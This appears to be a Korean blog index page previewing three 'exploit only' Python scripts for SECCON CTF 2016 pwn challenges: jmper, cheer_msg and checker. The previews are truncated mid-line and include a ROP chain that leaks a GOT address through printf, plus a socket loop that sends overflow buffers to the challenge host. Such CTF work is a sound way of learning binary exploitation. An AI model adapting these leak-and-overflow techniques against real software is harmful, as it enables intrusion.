반응형 2016/12/113 [exploit] 2016 SecconCTF - jmper writeups (exploit only) #!/usr/bin/env python import socket import telnetlib import struct from collections import deque p = lambda x: struct.pack( " 2016. 12. 11. [exploit] 2016 SecconCTF - cheer_msg writeups (exploit only) #!/usr/bin/env python import socket import struct import telnetlib p = lambda x: struct.pack( "" ) s.send( "-150\n" ) u_recv( "Message >>" ) pay = p( printf_plt ) pay += p( pppr ) pay += p( 0x804887d ) # \nThank you %s!\nMessage : %s\n pay += p( setbuf_got ) pay += p( setbuf_got ) pay += p( 0x80485ca ) # main s.send( pay+"\n" ) data = u_recv( "Message : " ) data = u_recv( "Message : " ) data = d.. 2016. 12. 11. [exploit] 2016 SecconCTF - checker writeups (exploit only) #!/usr/bin/env python import socket host = 'localhost' host = "checker.pwn.seccon.jp" port = 1120 port = 14726 s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) s.connect( ( host, port ) ) def u_recv( st ): bf = '' while st not in bf: bf += s.recv( 1 ) return bf print u_recv( "NAME :" ) s.send( "name\n" ); for i in range( 0x180, 0x170, -1 ): u_recv( ">>" ) pay = ("a"*i)+"\n.. 2016. 12. 11. 이전 1 다음 728x90